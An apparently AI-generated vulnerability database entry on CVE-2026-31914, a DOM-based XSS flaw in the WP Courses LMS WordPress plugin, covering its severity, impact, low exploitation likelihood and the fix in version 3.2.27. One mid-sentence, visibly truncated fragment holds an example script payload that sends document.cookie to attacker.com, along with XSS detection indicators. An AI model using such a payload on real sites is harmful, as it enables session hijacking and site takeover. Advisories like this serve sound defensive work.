
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-31914 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the WP Courses LMS WordPress plugin developed by hookandhook. It affects all versions of the plugin up to and including 3.2.26, and was discovered by researcher Nguyen Duc Canh (canhnguyen26) and reported on January 22, 2026, with public disclosure on March 23–25, 2026. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically manifesting as DOM-Based XSS. Exploitation requires a low-privileged authenticated user (Subscriber level) to initiate the attack, and successful exploitation additionally requires interaction from a higher-privileged user (e.g., clicking a malicious link or visiting a crafted page). The flaw arises from insufficient sanitization of user-supplied input that is written directly into the DOM, allowing injection of arbitrary JavaScript payloads (Patchstack).
Successful exploitation allows an attacker to inject and execute malicious scripts in the context of a victim's browser session, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to affect other resources such as the victim's browser environment. Given the WordPress context, a compromised administrator session could lead to full site takeover (Patchstack).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.033%, indicating a low probability of exploitation in the near term. Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity. No CISA KEV catalog listing has been identified for this CVE (Patchstack, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in the victim's browser via DOM manipulation.%3Cscript%3E, javascript:, onerror=).The vulnerability is patched in WP Courses LMS version 3.2.27. Site administrators should update the plugin to version 3.2.27 or later immediately. Patchstack users benefit from a virtual patching/mitigation rule that blocks exploitation attempts until the plugin is updated. If an immediate update is not possible, restricting Subscriber-level user registration or disabling the plugin temporarily are viable interim mitigations (Patchstack).
The vulnerability was covered in Wordfence's weekly WordPress vulnerability report for the period of March 23–29, 2026, indicating routine tracking by the WordPress security community. Patchstack, which coordinated disclosure, classified it as medium priority and noted its potential for use in mass-exploit campaigns. No notable individual researcher commentary or significant social media discussion has been identified beyond standard vulnerability database entries.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."